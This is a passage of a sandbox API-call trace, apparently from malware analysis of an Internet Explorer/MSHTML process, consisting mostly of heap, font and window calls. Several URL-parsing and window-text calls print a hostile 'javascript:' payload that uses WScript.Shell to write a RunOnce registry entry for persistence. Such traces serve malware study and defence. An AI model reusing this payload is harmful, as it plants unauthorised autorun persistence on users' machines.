dwFlags=0x0, lpMem=0x7cd0d8 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c3e00 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a8ea0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78bbb0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a27a0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a32e0 | out: hHeap=0x760000) returned 1 [0075.373] GetCurrentThreadId () returned 0x544 [0075.373] GetCurrentThreadId () returned 0x544 [0075.373] GetCurrentThreadId () returned 0x544 [0075.373] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc) returned 0x78bbb0 [0075.374] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x64) returned 0x7c68c0 [0075.617] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xec) returned 0x7a3098 [0075.617] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.617] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.618] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xdc) returned 0x7bf6a0 [0075.619] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77dab0 [0075.619] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x250) returned 0x7a27a0 [0075.619] LsGetRubyLsimethods () returned 0x0 [0075.619] LsGetTatenakayokoLsimethods () returned 0x0 [0075.619] LsGetHihLsimethods () returned 0x0 [0075.619] LsGetWarichuLsimethods () returned 0x0 [0075.619] LsGetReverseLsimethods () returned 0x0 [0075.619] LsCreateContext () returned 0x0 [0075.619] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x670) returned 0x7cd740 [0075.619] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x24) returned 0x7a8f28 [0075.619] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x110) returned 0x7bc148 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x24) returned 0x7a92e8 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x2e4) returned 0x79b898 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x790a18 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x790a68 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xa0) returned 0x7a29f8 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x7b4798 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x790a90 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x7c4a98 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x7c4ea8 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x7c4ed0 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x400) returned 0x79bb88 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x7b2ce8 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x7b2d08 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x7b2d18 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x7b2d28 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x128) returned 0x7a2f28 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x11c) returned 0x7a8d00 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x108) returned 0x7cddb8 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x130) returned 0x79bf90 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x110) returned 0x7bc260 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x278) returned 0x79c0c8 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc8) returned 0x7a8e28 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x190) returned 0x79c348 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x78) returned 0x772390 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xf0) returned 0x7cdec8 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x4c) returned 0x7a32e0 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x194) returned 0x79c4e0 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc8) returned 0x79c680 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x190) returned 0x79c750 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x108) returned 0x79c8e8 [0075.621] LsSetModWidthPairs () returned 0x0 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x240) returned 0x79c9f8 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x18) returned 0x7c3e00 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x7c4ef8 [0075.622] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x78bc40 [0075.622] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x2e0) returned 0x79cc40 [0075.622] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x24) returned 0x7a9318 [0075.622] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc0) returned 0x79cf28 [0075.622] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc0) returned 0x79cff0 [0075.623] LsSetBreaking () returned 0x0 [0075.623] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x271) returned 0x79d0b8 [0075.623] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xa) returned 0x78b940 [0075.623] LsSetDoc () returned 0x0 [0075.623] IBindStatusCallback:OnLowResource (This=0x7b2ce8, reserved=0x7cd8ec) returned 0x0 [0075.623] IBindStatusCallback:OnLowResource (This=0x7b2d08, reserved=0x7cd8ec) returned 0x0 [0075.623] IBindStatusCallback:OnLowResource (This=0x7b2d18, reserved=0x7cd8ec) returned 0x0 [0075.623] IBindStatusCallback:OnLowResource (This=0x7b2d28, reserved=0x7cd8ec) returned 0x0 [0075.623] LsCreateLine () returned 0x0 [0075.623] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.623] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb4) returned 0x79d338 [0075.623] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xf8) returned 0x79d3f8 [0075.623] EnumFontsW (hdc=0x3010a0d, lpLogfont="Times New Roman", lpProc=0x74c40b47, lParam=0x33e584) returned 1 [0075.624] CreateFontIndirectW (lplf=0x33e520) returned 0x50a08b0 [0075.624] SelectObject (hdc=0x3010a0d, h=0x50a08b0) returned 0x18a002e [0075.624] GetTextMetricsW (in: hdc=0x3010a0d, lptm=0x33e488 | out: lptm=0x33e488) returned 1 [0075.624] GetOutlineTextMetricsW (in: hdc=0x3010a0d, cjCopy=0xd8, potm=0x33e388 | out: potm=0x33e388) returned 0xd8 [0075.625] SelectObject (hdc=0x3010a0d, h=0x18a002e) returned 0x50a08b0 [0075.625] SelectObject (hdc=0x3010a0d, h=0x50a08b0) returned 0x18a002e [0075.625] GetTextFaceW (in: hdc=0x3010a0d, c=32, lpName=0x33e5d8 | out: lpName="Times New Roman") returned 16 [0075.625] SelectObject (hdc=0x3010a0d, h=0x18a002e) returned 0x50a08b0 [0075.625] SelectObject (hdc=0x3010a0d, h=0x50a08b0) returned 0x18a002e [0075.625] GetTextCharsetInfo (in: hdc=0x3010a0d, lpSig=0x33e540, dwFlags=0x0 | out: lpSig=0x33e540) returned 0 [0075.625] SelectObject (hdc=0x3010a0d, h=0x18a002e) returned 0x50a08b0 [0075.625] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xc) returned 0x7c64b8 [0075.625] SelectObject (hdc=0x3010a0d, h=0x50a08b0) returned 0x18a002e [0075.625] GetFontUnicodeRanges (in: hdc=0x3010a0d, lpgs=0x0 | out: lpgs=0x0) returned 0x27c [0075.625] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.625] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x27c) returned 0x7ca4b8 [0075.625] GetFontUnicodeRanges (in: hdc=0x3010a0d, lpgs=0x7ca4b8 | out: lpgs=0x7ca4b8) returned 0x27c [0075.625] SelectObject (hdc=0x3010a0d, h=0x18a002e) returned 0x50a08b0 [0075.625] SelectObject (hdc=0x3010a0d, h=0x50a08b0) returned 0x18a002e [0075.625] GetCharWidth32W (in: hdc=0x3010a0d, iFirst=0x20, iLast=0x7e, lpBuffer=0x33e518 | out: lpBuffer=0x33e518) returned 1 [0075.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x17c) returned 0x7ca740 [0075.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x800) returned 0x7ca8c8 [0075.628] SelectObject (hdc=0x3010a0d, h=0x18a002e) returned 0x50a08b0 [0075.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb4) returned 0x79d7b0 [0075.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb4) returned 0x7cb0d0 [0075.628] LsQueryLineDup () returned 0x0 [0075.629] LsDestroyLine () returned 0x0 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x7b3088 [0075.629] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x7b47e0 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x79cc40 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] IntersectRect (in: lprcDst=0x33f35c, lprcSrc1=0x33f35c, lprcSrc2=0x33f32c | out: lprcDst=0x33f35c) returned 1 [0075.629] IntersectRect (in: lprcDst=0x7ad580, lprcSrc1=0x7ad580, lprcSrc2=0x33f34c | out: lprcDst=0x7ad580) returned 1 [0075.629] IntersectRect (in: lprcDst=0x7ad580, lprcSrc1=0x7ad580, lprcSrc2=0x33f36c | out: lprcDst=0x7ad580) returned 1 [0075.629] IntersectRect (in: lprcDst=0x33f01c, lprcSrc1=0x33f01c, lprcSrc2=0x33efec | out: lprcDst=0x33f01c) returned 1 [0075.630] IntersectRect (in: lprcDst=0x7ad580, lprcSrc1=0x7ad580, lprcSrc2=0x33f00c | out: lprcDst=0x7ad580) returned 1 [0075.630] IntersectRect (in: lprcDst=0x7ad580, lprcSrc1=0x7ad580, lprcSrc2=0x33f02c | out: lprcDst=0x7ad580) returned 1 [0075.630] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.630] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33ef30, lprcSrc1=0x33ef30, lprcSrc2=0x7ad570 | out: lprcDst=0x33ef30) returned 1 [0075.630] UnionRect (in: lprcDst=0x33f238, lprcSrc1=0x33f238, lprcSrc2=0x33f1e4 | out: lprcDst=0x33f238) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f1d0, lprcSrc1=0x33f1d0, lprcSrc2=0x33f168 | out: lprcDst=0x33f1d0) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f0e0, lprcSrc1=0x33f0e0, lprcSrc2=0x33f168 | out: lprcDst=0x33f0e0) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f178, lprcSrc1=0x33f178, lprcSrc2=0x33f0e0 | out: lprcDst=0x33f178) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f1d0, lprcSrc1=0x33f1d0, lprcSrc2=0x33f168 | out: lprcDst=0x33f1d0) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f1d0, lprcSrc1=0x33f1d0, lprcSrc2=0x33f168 | out: lprcDst=0x33f1d0) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f0e0, lprcSrc1=0x33f0e0, lprcSrc2=0x33f168 | out: lprcDst=0x33f0e0) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f178, lprcSrc1=0x33f178, lprcSrc2=0x33f0e0 | out: lprcDst=0x33f178) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f1d0, lprcSrc1=0x33f1d0, lprcSrc2=0x33f168 | out: lprcDst=0x33f1d0) returned 1 [0075.630] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.630] UnionRect (in: lprcDst=0x33f578, lprcSrc1=0x33f578, lprcSrc2=0x33f524 | out: lprcDst=0x33f578) returned 1 [0075.630] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9348 [0075.630] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a9348 | out: hHeap=0x760000) returned 1 [0075.630] RedrawWindow (hWnd=0x302a0, lprcUpdate=0x33f5f8, hrgnUpdate=0x0, flags=0x21) returned 1 [0075.630] GetFocus () returned 0x302a0 [0075.630] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x7b2d38 [0075.630] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x4) returned 0x7b2d48 [0075.630] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9348 [0075.630] GetFocus () returned 0x302a0 [0075.631] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f2a0 | out: lpPoint=0x33f2a0) returned 1 [0075.631] GetCapture () returned 0x0 [0075.631] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9378 [0075.631] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0075.631] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a93a8 [0075.631] GetCurrentThreadId () returned 0x544 [0075.631] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.631] GetCurrentThreadId () returned 0x544 [0075.632] GetCurrentThreadId () returned 0x544 [0075.632] GetFocus () returned 0x302a0 [0075.632] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f2a0 | out: lpPoint=0x33f2a0) returned 1 [0075.632] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0075.632] GetCurrentThreadId () returned 0x544 [0075.632] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.632] GetCurrentThreadId () returned 0x544 [0075.632] GetCurrentThreadId () returned 0x544 [0075.632] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x7b1450, Size=0x6c) returned 0x7a2aa0 [0075.633] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f2a0 | out: lpPoint=0x33f2a0) returned 1 [0075.633] GetCapture () returned 0x0 [0075.633] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0075.633] GetCurrentThreadId () returned 0x544 [0075.633] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.633] GetCurrentThreadId () returned 0x544 [0075.633] GetCurrentThreadId () returned 0x544 [0075.633] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f2a0 | out: lpPoint=0x33f2a0) returned 1 [0075.634] GetCapture () returned 0x0 [0075.634] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0075.634] GetCurrentThreadId () returned 0x544 [0075.634] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.634] GetCurrentThreadId () returned 0x544 [0075.634] GetCurrentThreadId () returned 0x544 [0075.634] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f2a0 | out: lpPoint=0x33f2a0) returned 1 [0075.635] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0075.635] GetCurrentThreadId () returned 0x544 [0075.635] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.635] GetCurrentThreadId () returned 0x544 [0075.635] GetCurrentThreadId () returned 0x544 [0075.635] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f2a0 | out: lpPoint=0x33f2a0) returned 1 [0075.635] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0075.636] GetCurrentThreadId () returned 0x544 [0075.636] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.636] GetCurrentThreadId () returned 0x544 [0075.636] GetCurrentThreadId () returned 0x544 [0075.636] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x7a2aa0, Size=0x9c) returned 0x7a2aa0 [0075.636] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a93a8 | out: hHeap=0x760000) returned 1 [0075.636] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b2d38 | out: hHeap=0x760000) returned 1 [0075.636] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a9378 | out: hHeap=0x760000) returned 1 [0075.636] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b2d48 | out: hHeap=0x760000) returned 1 [0075.636] GetCurrentThreadId () returned 0x544 [0075.636] GetFocus () returned 0x302a0 [0075.636] GetFocus () returned 0x302a0 [0075.636] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ppu=0x33f5f0 | out: ppu=0x33f5f0) returned 0x0 [0075.784] IUnknown:AddRef (This=0x78c78c) returned 0x4 [0075.784] IUri:GetAbsoluteUri (in: This=0x78c78c, pbstrAbsoluteUri=0x33f670 | out: pbstrAbsoluteUri=0x33f670*="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0075.784] IUnknown:Release (This=0x78c78c) returned 0x3 [0075.784] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0075.784] ShouldShowIntranetWarningSecband () returned 0x0 [0075.961] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ef14 | out: ppv=0x33ef14*=0x75028d20) returned 0x0 [0075.961] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33f000 | out: ppvObject=0x33f000*=0x75028d2c) returned 0x0 [0075.961] IUnknown:Release (This=0x75028d20) returned 0x1 [0075.961] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=3, dwParseFlags=0x0, pwzResult=0x7a5340, cchResult=0xfe, pcchResult=0x33f048, dwReserved=0x0 | out: pwzResult="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pcchResult=0x33f048*=0xfe) returned 0x0 [0075.961] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x7a5b60 [0075.961] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a5b60 | out: hHeap=0x760000) returned 1 [0075.961] IUnknown:Release (This=0x75028d2c) returned 0x1 [0075.962] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ef14 | out: ppv=0x33ef14*=0x75028d20) returned 0x0 [0075.962] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33f000 | out: ppvObject=0x33f000*=0x75028d2c) returned 0x0 [0075.962] IUnknown:Release (This=0x75028d20) returned 0x1 [0075.962] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=17, dwParseFlags=0x0, pwzResult=0x7a5340, cchResult=0xfe, pcchResult=0x33f058, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33f058*=0x0) returned 0x800c0011 [0075.962] IUnknown:Release (This=0x75028d2c) returned 0x1 [0075.962] GetIUriPriv () returned 0x0 [0075.962] IUnknown:Release (This=0x78c78c) returned 0x3 [0075.962] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f468 | out: lpPoint=0x33f468) returned 1 [0075.963] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0075.963] GetCurrentThreadId () returned 0x544 [0075.963] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.963] GetCurrentThreadId () returned 0x544 [0075.963] GetCurrentThreadId () returned 0x544 [0075.963] GetFocus () returned 0x302a0 [0075.963] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f5d8 | out: lpPoint=0x33f5d8) returned 1 [0075.963] GetClientRect (in: hWnd=0x302a0, lpRect=0x33f5c8 | out: lpRect=0x33f5c8) returned 1 [0075.963] LoadStringW (in: hInstance=0x73710000, uID=0x1fe9, lpBuffer=0x33f260, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4 [0075.963] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a5750 | out: hHeap=0x760000) returned 1 [0075.963] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7cd1e8 | out: hHeap=0x760000) returned 1 [0075.964] IUnknown:AddRef (This=0x78c78c) returned 0x4 [0075.964] IUri:GetScheme (in: This=0x78c78c, pdwScheme=0x33e6ec | out: pdwScheme=0x33e6ec*=0xf) returned 0x0 [0075.964] IUri:GetDisplayUri (in: This=0x78c78c, pbstrDisplayString=0x33e6f8 | out: pbstrDisplayString=0x33e6f8*="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0075.964] GetWindowTextW (in: hWnd=0x3027a, lpString=0x33e298, nMaxCount=512 | out: lpString="") returned 0 [0075.964] NtdllDefWindowProc_W () returned 0x0 [0075.964] SetWindowTextW (hWnd=0x3027a, lpString="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 1 [0075.964] NtdllDefWindowProc_W () returned 0x1 [0075.964] IUnknown:Release (This=0x78c78c) returned 0x3 [0075.964] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0075.965] SendMessageW (hWnd=0x6011a, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0075.965] NtdllDefWindowProc_W () returned 0x0 [0075.965] NtdllDefWindowProc_W () returned 0x0 [0075.966] NtdllDefWindowProc_W () returned 0x0 [0075.966] SendMessageW (hWnd=0x3027a, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0 [0075.966] NtdllDefWindowProc_W () returned 0x0 [0075.966] SetWindowLongW (hWnd=0x3027a, nIndex=-16, dwNewLong=-2100363264) returned -2033254400 [0075.966] NtdllDefWindowProc_W () returned 0x0 [0075.966] NtdllDefWindowProc_W () returned 0x0 [0076.638] NtdllDefWindowProc_W () returned 0x10027 [0076.638] SetWindowLongW (hWnd=0x3027a, nIndex=-20, dwNewLong=262144) returned 262400 [0076.638] NtdllDefWindowProc_W () returned 0x0 [0076.638] NtdllDefWindowProc_W () returned 0x0 [0076.639] SetWindowPos (hWnd=0x3027a, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, 